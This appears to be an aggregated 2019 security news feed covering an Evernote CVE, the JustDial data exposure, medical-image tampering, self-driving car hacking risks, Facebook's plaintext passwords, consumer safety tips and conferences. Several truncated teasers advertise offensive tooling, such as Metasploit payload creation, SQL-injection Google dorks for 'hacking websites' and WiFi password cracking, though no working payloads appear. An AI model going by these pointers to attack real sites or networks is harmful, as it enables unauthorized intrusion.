A patch for this issue was released in Evernote 7.10 Beta 1 and 7.9.1 GA for macOS [MACOSNOTE-28840]. CVE-2019-10038 was assigned to this issue.

About the Author: Security Researcher Dhiraj Mishra (@mishradhiraj_)

Original post at:

https://www.inputzero.io/2019/04/evernote-cve-2019-10038.html

Pierluigi Paganini

(Security Affairs – Evernote, hacking)

The post Code execution – Evernote appeared first on Security Affairs.

Justdial is leaking personal details of all customers real-time

A database belonging to the Indian local search service JustDial was left online without protection exposing personal data of over 100M users.

The archive is still leaking personally identifiable information of more than JustDial customers that are accessing the service via its website, mobile app, or even by calling on the customer care number (“88888 88888”).

The news was first reported by The Hacker News that independently verified the authenticity of the story.

JustDial is the largest and oldest search engine in India that allows its users to find vendors of various products and services.

The independent researcher Rajshekhar Rajaharia discovered how an unprotected, publicly accessible API endpoint of JustDial’s database can be accessed by anyone.

The leaked data includes username, email, mobile number, address, gender, date of birth, photo, occupation, company name and other.

According to the expert, data remained exposed since at least mid-2015 through unprotected API, at the time it is not clear if anyone had accessed the huge trove of data.

justdial data-breach-hacking

Experts at THN provided Rajshekhar a new phone number that was never before registered with Justdial server, then used it to contact the JustDial service and request information on restaurants, The service created a profile and associated it with the number provided by THN. Rajshekhar was able to access the profile a circumstance that confirmed that expose DB was the one associated with production systems.

“Although the unprotected API is connected to the primary JD database, Rajshekhar revealed that it’s an old API endpoint which is not currently being used by the company but left forgotten on the server.” reads the post published by THN.

Rajshekhar discovered this unprotected end-point while conducting a penetration test on the latest APIs, which are apparently protected.

Rajshekhar also found other issued associated with old unprotected APIs, one of them could be exploited by anyone to trigger OPT request for any registered phone number making possible to spam users.

Rajshekhar attempted to report the issues to the company but without success.

Pierluigi Paganini

(SecurityAffairs – hacking, JustDial)

The post Justdial is leaking personal details of all customers real-time appeared first on Security Affairs.

Maliciously Tampering with Medical Imagery

In what I am sure is only a first in many similar demonstrations, researchers are able to add or remove cancer signs from CT scans. The results easily fool radiologists.

I don't think the medical device industry has thought at all about data integrity and authentication issues. In a world where sensor data of all kinds is undetectably manipulatable, they're going to have to start.

Research paper. Slashdot thread.

UK hacker jailed for six years for blackmailing pornography site users

Zain Qaiser targeted millions of computers with ransomware demanding large sums

A hacker who blackmailed users of pornography websites in what investigators say is the UK’s most serious cybercrime case has been jailed for six years and five months.

Zain Qaiser targeted millions of computers with malicious browser-locking software that demanded payment of up to $1,000 (£765) to unfreeze screens, Kingston crown court heard.

Continue reading...

Are Hackers Threatening the Adoption of Self-Driving Cars?

Automotive manufacturers have realized the future lies in self-driving cars. We may be taking small steps, yet we would like to be headed to an autonomous driving utopia. Here, every road is safe, smart, connected, fast, reliable.

It may be just a dream right now, but how far are we from achieving this goal?

In this article, we will walk you through the current state of autonomous vehicles, and most importantly, examine how safe driverless cars actually are from a cybersecurity perspective.

A brief history of self-driving cars

Let’s start off with a little bit of history.

You may be amazed to hear people started working on driverless cars prototypes since the 1920s. Back then, a radio-controlled car was invented by Francis Houdina, which he controlled without a person behind the steering wheel on the streets of New York.

Impressive, right?

Throughout time, there have been multiple attempts to develop the industry and encourage driverless cars’ adoption. You can access this resource to go through a quick timeline of self-driving cars.

Fast forward to more recent days, Waymo, formerly known as Google’s self-driving car project, is the first commercial self-driving car and was launched in December 2018. Through an app, Waymo offers ride-hailing services to people in from the United States, Phoenix area.

Will 2019 be the year of self-driving cars?

Here are a few facts and predictions for 2019:

  • This year, companies such as General Motors, Uber, Volkswagen, and Intel are competing in the ride-hailing movement and are making promises regarding when their fully autonomous vehicles will be available. The general answer seems to be between 2019 and 2022.
  • Elon Musk, CEO of Tesla, is expecting to see Tesla’s self-driving feature fully available by 2020.
  • The UK government has announced its commitment to having completely autonomous vehicles on the roads by 2021.
  • 2019 will be the year of Level 4 autonomous vehicles.

Did you know a car can have six automation levels?

In the image below you can see exactly what Level 0 to Level 5 actually mean.

image4 1

Source

How do people view self-driving cars?

Autonomous vehicle manufacturers promise to deliver a safe, enjoyable, and fast experience, freeing the drivers of the stress of driving, while allowing them to fulfill other tasks.

But what is the general opinion towards autonomous cars?

According to Deloitte’s 2019 Global Automotive Study, consumer perception of the safety of autonomous cars has stalled in the last year. This attitude is predominantly influenced by media reports of accidents involving self-driving cars, many of which were fatal.

Here you can read a report on these type of accidents.

Source: Deloitte

The concern around safety is also reinforced by Perkincoie’s research, which shows that consumers’ perception of safety is the biggest roadblock to the development of self-driving vehicles in the next five years.

As per another study conducted by the American Automobile Association (AAA), almost 3 in 4 Americans are afraid of self-driving cars. According to the same research, only 19% would trust self-driving cars to transport their loved ones.

What’s more, there are some people who seem to despise the autonomous vehicle’s technology and even manifest violent behavior towards it. At least 21 attacks against Waymo cars have been reported. People have tried to run the vehicles off the road, thrown rocks at them, slashed the tires, or even yelled at them to leave the neighborhood. This behavior seems to be fueled by people’s concern with safety and even potential job losses.

Some also believe self-driving will most likely cause traffic congestions.

What is the reason for that, you may be wondering since they were created to simplify traffic movement in the first place?

The autonomous cars could be programmed to aimlessly drive on the streets, without parking, in order to avoid payments. Basically, the price for recharging an electric autonomous car would be much lower than the overall parking fee.

The concerns around data collection and privacy

The same Deloitte 2019 report shows most people are worried about biometric data being collected by self-driving car manufacturers through their connected vehicles and sent to other parties.

Source: Deloitte

In truth, data does need to be collected in order to improve functionalities, but this could also cause the invasion of your privacy.

So the question is where that data ends up and how it’s actually used. Some may argue that it could be shared with the government or used for marketing purposes.

Thus, authorities need to put strict rules and regulations in place.

Solving the cybersecurity question

Without a doubt, autonomous vehicles need state-of-the-art cybersecurity.

According to a recent study which surveyed auto engineers and IT experts, 84% of respondents were concerned that car manufacturers are not keeping pace with the industry’s constantly increasing cybersecurity threats.

Since self-driving cars have been involved in numerous accidents, this means they still have flaws, which can become exploited by malicious actors. Although taking care of aspects such as having proper navigation systems and avoiding collisions are obvious priorities for manufacturers, cybersecurity should also be top of mind.

According to Skanda Vivek, a postdoctoral researcher at the Georgia Institute of Technology, if people were to hack even a small number of internet-connected self-driving cars on the roads of the United States, the flow of traffic would be completely frozen. And emergency vehicles would not even be able to pass through.

image5

Source: Skanda Vivek/ Georgia Tech

“Compromised vehicles are unlike compromised data,” argues Vivek in the study’s press release. “Collisions caused by compromised vehicles present physical danger to the vehicle’s occupants, and these disturbances would potentially have broad implications for overall traffic flow.”

Around four years ago, researchers Charlie Miller and Chris Valasek remotely hacked a Jeep Cherokee as an experiment. They used a laptop to do it while being at a 10-mile distance and managed to take full control of the vehicle.

Watch below what happened:

This was not even a self-driving vehicle, but the same scenario can be applied to one. In fact, this can even be more plausible in the case of autonomous cars due to their increased internet connectivity.

Right now, you won’t find two identical automation systems in the industry. Yet, according to the University of Michigan’s report, as systems become more generic, or even using open-source software, one attack could spread across every car deploying the same system. Just like it happened with the WannaCry ransomware attack, which infected more than 300,000 computers in 150 countries during, at an estimated cost of $4 billion.

But are things really that bad?

On a more positive note, there are cybersecurity experts who believe in the future, fully-autonomous cars will be much harder to be hacked than we might think. This “fully-autonomous” technology (remember Level 5 we were talking about above?), will rely on multiple sensors and communication layers.

At the moment, self-driving cars are only using one or two sensors for object detection, according to Craig Smith, research director of cyber analytics group Rapid7.

In his view, since it’s already quite difficult to hack a single sensor, a malicious criminal will find it even harder to override a complex sensor system.

“If we’re having a discussion about what’s safe, it’s more likely that you’ll get into a car accident today than someone will hack into your car tomorrow”, Smith pointed out.

How can we stop self-driving cars from being hacked?

The good news is that experts are constantly working on developing better security systems.

For instance, just a few weeks ago, SK Telecom announced the launch of a solution based on Quantum Encryption.

image3

Source

How does it work?

As per SK Telecom, this is an “integrated security device that will be installed inside cars and protect various electronic units and networks in the vehicle”.

Also, the gateway, which was developed together with the controller maker GINT, will be used to secure the all the vehicle systems: Vehicle-2-Everything (V2X) and Bluetooth communication systems, car’s driver assistance, radar, and smart keys. Drivers will also be alerted of any suspicious behavior.

The gateway basically transfers a quantum random number generator and Quantum Key along with the vehicle’s data that will “fundamentally prevent hacking and make the cars unhackable”, according to SK Telecom. The company also added that this move was to facilitate security in the 5G era.

This is not the first initiative of this kind. In another project, the cyber-security group at Coventry University’s Institute for Future Transport and Cities (FTC) teamed up with the quantum experts at cybersecurity start-up Crypta Labs and they also reportedly worked on this quantum technology that can prevent hacking.

Here’s a bonus

We stumbled upon a great video that we’d like to share with you, in which Victor Schwartz, a partner at Shook, Hardy & Bacon, talks about the potential risks of driverless cars – privacy issues and cybersecurity.

You can watch the full video here:

Conclusion

At the moment, concerns around the self-driving technology clearly outweigh the benefits. It’s now crucial for manufacturers to focus on autonomous cars cybersecurity problems, employing dedicated staff to work on these issues. However, with proper security measures in place, hacking risks can be, in time, dramatically reduced.

Would you trust a self-driving car? What’s your opinion on the overall security of autonomous vehicles? We would love to hear your thoughts in the comments section below.

The post Are Hackers Threatening the Adoption of Self-Driving Cars? appeared first on Heimdal Security Blog.

Scan WordPress websites for vulnerabilities WPScan Kali Linux

Scan WordPress websites for vulnerabilities WPScan Kali Linux   WPScan is a black box vulnerability scanner for WordPress websites. WPScan comes pre-installed in Kali Linux. Kali Linux is a popular Linux distribution built on Debian Kali Linux comes with many of the best ethical hacking tools pre-installed. If you’re not using Kali Linux and you […]

The post Scan WordPress websites for vulnerabilities WPScan Kali Linux appeared first on HackingVision.

DMitry Deepmagic information Gathering Tool Kali Linux

DMitry Deepmagic information Gathering Tool Kali Linux   DMitry (Deepmagic Information Gathering Tool) is a open source Linux CLI tool developed by James Greig. Coded in C. DMitry is a powerful information gathering tool that aims to gather as much information about a host that is possible. Features include subdomains search, email addresses, uptime information, […]

The post DMitry Deepmagic information Gathering Tool Kali Linux appeared first on HackingVision.

Facebook stored hundreds of millions of passwords unprotected

Company admits to mistake and says it has no evidence of abuse – but the risk was huge

Facebook mistakenly stored “hundreds of millions” of passwords in plaintext, unprotected by any encryption, the company has admitted.

The mistake, which led to user passwords being kept in Facebook’s internal servers in an insecure way, affects “hundreds of millions of Facebook Lite users, tens of millions of other Facebook users, and tens of thousands of Instagram users”, according to the social networking site. Facebook Lite is a version of Facebook created for use in nations where mobile data is unaffordable or unavailable.

Related: Facebook's security is so bad it's surprising Zuckerberg hasn't deleted his account

Continue reading...

Kali Linux Micro Hacking Station Raspberry Pi

Kali Linux Micro Hacking Station Raspberry Pi   Raspberry Pi is a small pocket sized low cost computer. Today we will be setting up Kali Linux on Raspberry Pi. We can use Kali Linux on Raspberry Pi to hack WiFi passwords, launch various social engineering attacks, Set up rogue access points and a wide range […]

The post Kali Linux Micro Hacking Station Raspberry Pi appeared first on HackingVision.

Create Metasploit Payload in Kali Linux MSFvenom Payload Creator

Create Metasploit Payload in Kali Linux MSFvenom Payload Creator (MSFPC)   Disclaimer Any actions and or activities related to the material contained within this Website is solely your responsibility. The misuse of the information in this website can result in criminal charges brought against the persons in question. The authors of Hackingvision.com will not be […]

The post Create Metasploit Payload in Kali Linux MSFvenom Payload Creator appeared first on HackingVision.

This Is How Easy It Is To Get Hacked – Vice News – HackingVision

This Is How Easy It Is To Get Hacked Vice News talks about how easy it is to get hacked. VICE News went to Moscow to see the country’s expert hackers in action. “If someone wants to hack you, they’re gonna be able to” former NSA hacker Patrick Wardle told VICE News. And if a […]

The post This Is How Easy It Is To Get Hacked – Vice News – HackingVision appeared first on HackingVision.

Google Dorks List 2019 SQLi Dorks – HackingVision

Google Dorks List 2019 SQLi Dorks Google Dorks List 2019, Google Dorks List, Find SQL Injectable Websites, Hack Websites using Google Dorks, Google Dorks List SQL Injection. Google Dorks List 2019 is a list of dorks to find SQL injectable websites. A Google dork query, sometimes just referred to as a dork, is a search […]

The post Google Dorks List 2019 SQLi Dorks – HackingVision appeared first on HackingVision.

25 Free eBooks to learn Python 2019 – HackingVision

Free eBooks list of free Python programming eBooks to learn Python programming. Download eBooks in PDF EPUB 2019 Python eBooks. List curated by Hackingvision.com Disclaimer: The contributor(s) cannot be held responsible for any misuse of the data. This repository is just a collection of URLs to download eBooks for free. Download the eBooks at your […]

The post 25 Free eBooks to learn Python 2019 – HackingVision appeared first on HackingVision.

DorkMe – Google Dorks Tool Search For Vulnrabilities

DorkMe – Google Dorks Tool Google Dorks Tool DorkMe is a tool designed with the purpose of making easier the searching of vulnerabilities with Google Dorks, such as SQL Injection vulnerabilities. Dependencies   pip install -r requirements.txt It is highly recommended to add more dorks for an effective search, keep reading to see how Usage […]

The post DorkMe – Google Dorks Tool Search For Vulnrabilities appeared first on HackingVision.

Automotive Technologies and Cyber Security

A guest article authored by Giles Kirkland
Giles is a car expert and dedicated automotive writer with a great passion for electric vehicles, autonomous cars and other innovative technologies. He loves researching the future of motorisation and sharing his ideas with auto enthusiasts across the globe. You can find him on Twitter, Facebook and at Oponeo.


Automotive Technologies and Cyber Security
Surveys show that about 50% of the UK feel that driverless vehicles will make their lives much easier and are eagerly anticipating the arrival of this exciting technology. Cities expect that when driverless car technology is fully implemented, the gridlock which now plagues their streets will be relieved to a large extent. Auto-makers predict that the new technology will encourage a surge in vehicle purchases, and technology companies are lining up with the major auto manufacturers to lend their experience and knowledge to the process, hoping to earn huge profits.



Delays to Driverless Technology
While some features of autonomous technology have already been developed and have been rolled out in various new vehicles, the full technology will probably not be mature for several decades yet. One of the chief holdups is in establishing the infrastructure necessary on the roads themselves and in cities, in order to safely enable driverless operation.

The full weight of modern technology is pushing development along at a breakneck pace. Unlike safety testing of the past, where some real-life scenarios were simulated to anticipate vehicle reactions, high-powered simulators have now been setup to increase the rapidity at which vehicle software can 'learn' what to do in those real-life situations. This has enabled learning at a rate exponentially greater than any vehicle of the past, which is not surprising, since vehicles of the past were not equipped with 'brains' like autonomous cars will be.

The Cyber Security aspect of Autonomous Vehicles
Despite the enormous gains that will come from autonomous vehicles, both socially and economically, there will inevitably be some problems which will arise, and industry experts agree that the biggest of these threats is cyber security. In 2015, there was a famous incident which dramatically illustrated the possibilities. In that year, white-collar hackers took control of a Jeep Cherokee remotely by hacking into its Uconnect Internet-enabled software, and completely cut off its connection with the Internet. This glaring shortcoming caused Chrysler to immediately recall more than one million vehicles, and provided the world with an alarming illustration of what could happen if someone with criminal intent breached the security system of a vehicle.

Cars of today have as many as 100 Electronic Control Units (ECU's), which support more than 100 million coding lines, and that presents a huge target to the criminal-minded person. Any hacker who successfully gains control of a peripheral ECU, for instance the vehicle's Bluetooth system, would theoretically be able to assume full control of other ECU's which are responsible for a whole host of safety systems. Connected cars of the future will of course have even more ECU's controlling the vehicle's operations, which will provide even more opportunities for cyber attack.


Defense against Cyber Attacks
As scary as the whole cyber situation sounds, with the frightening prospect of complete loss of control of a vehicle, there is reason for thinking that the threat can be managed effectively. There are numerous companies already involved in research and development on how to make cars immune from attacks, using a multi-tiered defense system involving several different security products, installed on different levels of the car's security system.

Individual systems and ECU's can be reinforced against attacks. Up one level from that, software protection is being developed to safeguard the vehicle's entire internal network. In the layer above that, there are already solutions in place to defend vehicles at the point where ECU's connect to external sources. This is perhaps the most critical area, since it represents the line between internal and external communications. The final layer of security comes from the cloud itself. Cyber threats can be identified and thwarted before they are ever sent to a car.

The Cyber Security Nightmare
If you ask an average person in the UK what the biggest problem associated with driverless cars is, they’d probably cite the safety issue. Industry experts however, feel that once the technology has been worked out, there will probably be less highway accidents and that driving safety will actually be improved. However, the nightmare of having to deal with the threat which always exists when anything is connected to the Internet, will always be one which is cause for concern.

AI & Your Family: The Wows and Potential Risks

artificial intelligenceAm I the only one? When I hear or see the word Artificial Intelligence (AI), my mind instantly defaults to images from sci-fi movies I’ve seen like I, Robot, Matrix, and Ex Machina. There’s always been a futuristic element — and self-imposed distance — between AI and myself.

But AI is anything but futuristic or distant. AI is here, and it’s now. And, we’re using it in ways we may not even realize.

AI has been woven throughout our lives for years in various expressions of technology. AI is in our homes, workplaces, and our hands every day via our smartphones.

Just a few everyday examples of AI:

  • Cell phones with built-in smart assistants
  • Toys that listen and respond to children
  • Social networks that determine what content you see
  • Social networking apps with fun filters
  • GPS apps that help you get where you need to go
  • Movie apps that predict what show you’d enjoy next
  • Music apps that curate playlists that echo your taste
  • Video games that deploy bots to play against you
  • Advertisers who follow you online with targeted ads
  • Refrigerators that alert you when food is about to expire
  • Home assistants that carry out voice commands
  • Flights you take that operate via an AI autopilot

The Technology

While AI sounds a little intimidating, it’s not when you break it down. AI is technology that can be programmed to accomplish a specific set of goals without assistance. In short, it’s a computer’s ability to be predictive — to process data, evaluate it, and take action.

AI is being implemented in education, business, manufacturing, retail, transportation, and just about any other sector of industry and culture you can imagine. It’s the smarter, faster, more profitable way to accomplish manual tasks.

An there’s tons of AI-generated good going on. Instagram — the #2 most popular social network — is now using AI technology to detect and combat cyberbullying on in both comments and photos.

No doubt, AI is having a significant impact on everyday life and is positioned to transform the future.

Still, there are concerns. The self-driving cars. The robots that malfunction. The potential jobs lost to AI robots.

So, as quickly as this popular new technology is being applied, now is a great time to talk with your family about both the exciting potential of AI and the risks that may come with it.

Talking points for families

Fake videos, images. AI is making it easier for people to face swap within images and videos. A desktop application called FakeApp allows users to seamlessly swap faces and share fake videos and images. This has led to the rise in “deep fake” videos that appear remarkably realistic (many of which go viral). Tip: Talk to your family about the power of AI technology and the responsibility and critical thinking they must exercise as they consume and share online content.

Privacy breaches. Following the Cambridge Analytica/Facebook scandal of 2018 that allegedly used AI technology unethically to collect Facebook user data, we’re reminded of those out to gather our private (and public) information for financial or political gain. Tip: Discuss locking down privacy settings on social networks and encourage your kids to be hyper mindful about the information they share in the public feed. That information includes liking and commenting on other content — all of which AI technology can piece together into a broader digital picture for misuse.

Cybercrime. As outlined in McAfee’s 2019 Threats Prediction Report, AI technology will likely allow hackers more ease to bypass security measures on networks undetected. This can lead to data breaches, malware attacks, ransomware, and other criminal activity. Additionally, AI-generated phishing emails are scamming people into handing over sensitive data. Tip: Bogus emails can be highly personalized and trick intelligent users into clicking malicious links. Discuss the sophistication of the AI-related scams and warn your family to think about every click — even those from friends.

IoT security. With homes becoming “smarter” and equipped with AI-powered IoT products, the opportunity for hackers to get into these devices to steal sensitive data is growing. According to McAfee’s Threat Prediction Report, voice-activated assistants are especially vulnerable as a point-of-entry for hackers. Also at risk, say security experts, are routers, smartphones, and tablets. Tip: Be sure to keep all devices updated. Secure all of your connected devices and your home internet at its source — the network. Avoid routers that come with your ISP (Internet Security Provider) since they are often less secure. And, be sure to change the default password and secure your primary network and guest network with strong passwords.

The post AI & Your Family: The Wows and Potential Risks appeared first on McAfee Blogs.

Cyber Security Conferences to Attend in 2019

A list of Cyber and Information Security conferences to consider attending in 2019. Conference are not only great places to learn about the evolving cyber threat landscape and proven security good practices, but to network with industry leading security professionals and likeminded enthusiasts, to share ideas, expand your own knowledge, and even to make good friends.

JANUARY 2019

SANS Cyber Threat Intelligence Summit
Monday 21st & Tuesday 22nd January 2019
Renaissance Arlington Capital View Hotel, VA, USA
https://www.sans.org/event/cyber-threat-intelligence-summit-2018


AppSec California 2019 (OWASP)
Tuesday 22nd & Wednesday 23rd January 2019
Annenberg Community Beach House, Santa Monica, USA
https://2019.appseccalifornia.org/


PCI London
Thursday 24th January 2019
Park Plaza Victoria Hotel, London, UK
https://akjassociates.com/event/pcilondon

The Future of Cyber Security Manchester
Thursday 24th January 2019
Bridgewater Hall, Manchester, UK
https://cybermanchester.events/

BSides Leeds
Friday 25th January 2019
Cloth Hall Court, Leeds, UK
FEBRUARY 2019
Cyber Security for Industrial Control Systems

Thursday 7th & Friday 8th February 2019
Savoy Place, London, UK
https://events.theiet.org/cyber-ics/index.cfm

NOORD InfoSec Dialogue UK
Tuesday 26th & Wednesday 27th February 2019
The Bull-Gerrards Cross, Buckinghamshire, UK

MARCH 2019
RSA Conference
Monday 4th to Friday 8th March 2019
At Moscone Center, San Francisco, USA
https://www.rsaconference.com/events/us19

17th Annual e-Crime & Cybersecurity Congress
Tuesday 5th & Wednesday 6th March 2019
Park Plaza Victoria

Security & Counter Terror Expo
Tuesday 5th & Wednesday 6th March 2019
Olympia, London, UK
https://www.counterterrorexpo.com/


ISF UK Spring Conference
Wednesday 6th & Thursday 7th March 2019
Regent Park, London, UK
https://www.securityforum.org/events/chapter-meetings/uk-spring-conference-london/


BSidesSF
Sunday 3rd and Monday 4th March 2019
City View at Metreon, San Francisco, USA
https://bsidessf.org/

Cloud and Cyber Security Expo
Tuesday 12th to Wednesday 13 March 2019
At ExCel, London, UK
https://www.cloudsecurityexpo.com/

APRIL 2019

(ISC)2 Secure Summit EMEA
Monday 15th & Tuesday 16th April 2019
World Forum, The Hague, Netherlands
https://web.cvent.com/event/df893e22-97be-4b33-8d9e-63dadf28e58c/summary

Cyber Security Manchester
Wednesday 3rd & Thursday 4th April 2019
Manchester Central, Manchester, UK
https://cybermanchester.events/

BSides Scotland 2019
Tuesday 23rd April 2019
Royal College of Physicians, Edinburgh, UK
https://www.contextis.com/en/events/bsides-scotland-2019


CyberUK 2019
Wednesday 24th & Thursday 25th April 2019
Scottish Event Campus, Glasgow, UK
https://www.ncsc.gov.uk/information/cyberuk-2019

Cyber Security & Cloud Expo Global 2019
Thursday 25th and Friday 29th April 2019
Olympia, London, UK
https://www.cybersecuritycloudexpo.com/global/


JUNE 2019
Infosecurity Europe 2019
Tuesday 4th to Thursday 6th June 2019
Where Olympia, London, UK
https://www.infosecurityeurope.com/

BSides London

Thursday 6th June 2019
ILEC Conference Centre, London, UK
https://www.securitybsides.org.uk/

Blockchain International Show
Thursday 6th and Friday 7th June 2019
ExCel Exhibition & Conference Centre, London, UK
https://bisshow.com/

Hack in Paris 2019
Sunday 16th to Friday 20th June 2019
Maison de la Chimie, Paris, France
https://hackinparis.com/

UK CISO Executive Summit
Wednesday 19th June 2019
Hilton Park Lane, London, UK
https://www.evanta.com/ciso/summits/uk#overview

Cyber Security & Cloud Expo Europe 2019
Thursday 19th and Friday 20th June 2019
RIA, Amsterdam, Netherlands
https://cybersecuritycloudexpo.com/europe/

Gartner Security and Risk Management Summit
Monday 17th to Thursday 20th June 2019
National Harbor, MD, USA
https://www.gartner.com/en/conferences/na/security-risk-management-us

European Maritime Cyber Risk Management Summit
Tuesday 25th June 2019
Norton Rose Fulbright, London, UK


AUGUST 2019
Black Hat USA
Saturday 3rd to Thursday 8th August 2019
Mandalay Bay, Las Vegas, NV, USA
https://www.blackhat.com/upcoming.html

DEF CON 27

Thursday 8th to Sunday 11th August 2019
Paris, Ballys & Planet Hollywood, Las Vegas, NV, USA
https://www.defcon.org/


SEPTEMBER 2019
44Con
Wednesday 11th to Friday 13th September 2019
ILEC Conference Centre, London, UK
https://44con.com/

2019 PCI SSC North America Community Meeting
Tuesday 17th to Thursday 19th September 2019
Vancouver, BC, Canada
https://www.pcisecuritystandards.org/about_us/events

OCTOBER 2019

Hacker Halted
Thursday 10th & Friday 11th October 2019
Atlanta, Georgia, USA
https://www.hackerhalted.com/

BruCON
Thursday 10th & Friday 11th October 2019
Aula, Gent, Belgium
https://www.brucon.org/2019/

EuroCACS/CSX (ISACA) 2019

Wednesday 16th to Friday 19th October 2019
Palexpo Convention Centre, Geneva, Switzerland
https://conferences.isaca.org/euro-cacs-csx-2019

6th Annual Industrial Control Cyber Security Europe Conference
Tuesday 29th and Wednesday 30th October 2019
Copthorne Tara, Kensington, London, UK
https://www.cybersenate.com/new-events/2018/11/13/6th-annual-industrial-control-cyber-security-europe-conference

2019 PCI SSC Europe Community Meeting

Tuesday 22nd to Thursday 24th October 2019
Dublin, Ireland
https://www.pcisecuritystandards.org/about_us/events

ISF 30th Annual World Congress
Saturday 26th to Tuesday 29th October 2019
Convention Centre Dublin, Dublin, Ireland



NOVEMBER 2019
Cyber Security & Could Expo North America 2019
Wednesday 13th and Thursday 14th November 2019
Santa Clara Convention Centre, Silicon Valley, USA
https://www.cybersecuritycloudexpo.com/northamerica/

DevSecCon London 
Thursday 14th & Friday 15th November 2019
CodeNode, London, UK


Cyber Security Summit 2019
Wednesday 20th November 2019
QEII Centre, London, UK
https://cybersecuritysummit.co.uk/

2019 PCI SSC Asia-Pacific Community Meeting 

Wednesday 20th and Thursday 21st November 2019
Melbourne, Australia
https://www.pcisecuritystandards.org/about_us/events

DeepSec
Thursday 20th to Saturday 30th November 2019
The Imperial Riding School Vienna, Austria
https://deepsec.net/

Post in the comments about any cyber & information security themed conferences or events you recommend.

How To Tell If Your Smartphone Has Been Hacked

Your home screen is just a matrix of numbers. Your device loses its charge quickly, or restarts suddenly. Or, you notice outgoing calls that you never dialed. Chances are your smartphone has been hacked. The sad truth is that hackers now have a multitude of ways to get into your phone, without ever touching it.

Given that our smartphones have become our new wallets, containing a treasure trove of personal and financial information, a breach can leave you at serious risk.

The intruder could log in to your accounts as you, spam your contacts with phishing attacks, or rack up expensive long-distance charges. They could also access any passwords saved on your phone, potentially opening the door to sensitive financial accounts. That’s why it’s important to be able to recognize when your smartphone has been hacked, especially since some of the signs can be subtle.

Here are some helpful clues:

Performance Differences

Is your device operating slower, are web pages and apps harder to load, or does your battery never seem to keep a charge? What about your data plan? Are you exceeding your normal limits? These are all signs that you have malware running in the background, zapping your phone’s resources.

You may have downloaded a bad app, or clicked on a dangerous link in a text message. And malware, like Bitcoin miners, can strain computing power, sometimes causing the phone to heat up, even when you aren’t using it.

Mystery Apps or Data

If you find apps you haven’t downloaded, or calls, texts, and emails that you didn’t send, a hacker is probably in your system. They may be using your device to send premium rate calls or messages, or to spread malware to your contacts.

Pop-ups or Strange Screen Savers

Malware can also be behind spammy pop-ups, changes to your home screen, or bookmarks to suspicious websites. In fact, if you see any configuration changes you didn’t personally make, this is another big clue that your smartphone has been hacked.

What To Do

If any of these scenarios sound familiar, it’s time to take action. Start by deleting any apps or games you didn’t download, erasing risky messages, and running mobile security software, if you have it. Warn your contacts that your phone has been compromised, and to ignore any suspicious links or messages coming from you.

If the problem still doesn’t go away, consider restoring your phone to its original settings. Search online for instructions for your particular phone and operating system to learn how.

Now, let’s look at how to avoid getting hacked in the first place.

Secure Smartphone Tips

1. Use mobile security software—These days your smartphone is just as data rich as your computer. Make sure to protect your critical information, and your privacy, by using comprehensive mobile security software that not only protects you from online threats, but offers anti-theft and privacy protection.

2. Lock your device & don’t store passwords—Make sure that you are using a passcode or facial ID to lock your device when you’re not using it. This way, if you lose your phone it will be more difficult for a stranger to access your information.

Also, remember not to save password or login information for banking apps and other sensitive accounts. You don’t want a hacker to be able to automatically login as you if they do gain access to your device.

3. Avoid using public Wi-Fi—Free Wi-Fi networks, like those offered in hotels and airports, are often unsecured. This makes it easy for a hacker to potentially see the information you are sending over the network. Also, be wary of using public charging stations, unless you choose a “charging only” cable that cannot access your data.

 4. Never leave your device unattended in public—While many threats exist online, you still have to be aware of real-world threats, like someone grabbing your device when you’re not looking. Keep your smartphone on you, or within view, while in public.

If you have a “phone visibility” option, turn it off. This setting allows nearby devices to see your phone and exchange data with it.

5. Stay aware—New mobile threats are emerging all the time. Keep up on the latest scams and warning signs, so you know what to look out for.

Looking for more mobile security tips and trends? Be sure to follow @McAfee Home on Twitter, and like us on Facebook.

The post How To Tell If Your Smartphone Has Been Hacked appeared first on McAfee Blogs.

Busting 5 Cybersecurity Myths

It is not a secret that many people nowadays do not pay much attention when they surf the web at home or at work. There are new data breaches and exploits on a daily basis and still avoiding to take any precautions may result in a catastrophic consequences. Even the biggest corporations are paying millions of dollars so they can improve their cybersecurity and remain safe. However, if you still believe in some of the cybersecurity myths you may put your own computer or even your whole organization to a huge risk. We from CyberDB have decided to bust some of the top 5 cyber security myths and make it clear for you.

Only the IT department is responsible for cybersecurity

It is not wrong to say that the IT department is responsible to implement new processes and policies to keep the cybersecurity in a top notch state. However, they just don’t have a magic stick to protect all of the computers in the network. In reality each employee should be extremely careful when receiving and opening different e-mail messages from colleagues or third parties. It is dangerous since the infection can spread across all of the departments within the organization and this may cause a further data breach for example.

Using just an antivirus software is enough

Antivirus software might have been enough to safe your business from potential attack 20 years ago – nowadays it definitely is just not enough to protect your whole organization. Hackers find new ways to disable your antivirus and hide their attacks in the system. With ransomware gaining more popularity among hackers the time of getting infected and getting your information locked is just a matter of seconds. So using an antivirus is not always enough, but you also need to stay informed about the latest threats. Check out our database of cyber security vendors to find the best solution for your personal or business needs.

A strong password is enough

It is not a secret that having a long and complex password on your accounts is an essential. However, even big tech giants like Facebook or Apple experience data breaches and are pretty often a target for hackers. Every website requires you to create a strong password, but it is also good to use two-factor-authentication (2FA). At first the user was getting an SMS with a code for 2FA, but even this can be compromised by using a cloned sim card. So make sure you have an app like Google Authenticator for example to make your accounts more secure.

Threats are being spread only through the Internet

Some users may think that disconnecting from the internet will prevent the threats spreading around the network and they are completely wrong. Just imagine what happens if an employee brings an infected flash drive and plugs it in – all of the computers may become infected and your company may lose valuable information. You may have your information stolen even when you shop at a local retailer. So threats are not only online, but in our daily life and we need to be very careful and take care of our personal information.

Only certain industries experience cyber attacks

Some businesses still believe that they may be not targeted by hackers because they are a small or mid-sized business or in a specific industry. Well, they are completely wrong. Some companies also believe they do not have anything that hackers may find valuable to steal. In reality there is information like personal addresses or credit card numbers which can make every business in every industry a potential target. Here are the industries which are most vulnerable to cyber-attacks nowadays:

 Top 10 Sectors Breached

The post Busting 5 Cybersecurity Myths appeared first on CyberDB.

The Myth of “Staying One Step Ahead of the Hackers”

 

The assumption that software security can stay ahead of the hackers is not true because the software security industry is always reacting to threats that hackers expose. Once hackers start exploiting a flaw in an application, security companies try to block the resulting threat by providing security updates for existing software or by developing new programs. Either way, hackers will be one step ahead because the software security industry can’t predict what new threats the hackers will unleash.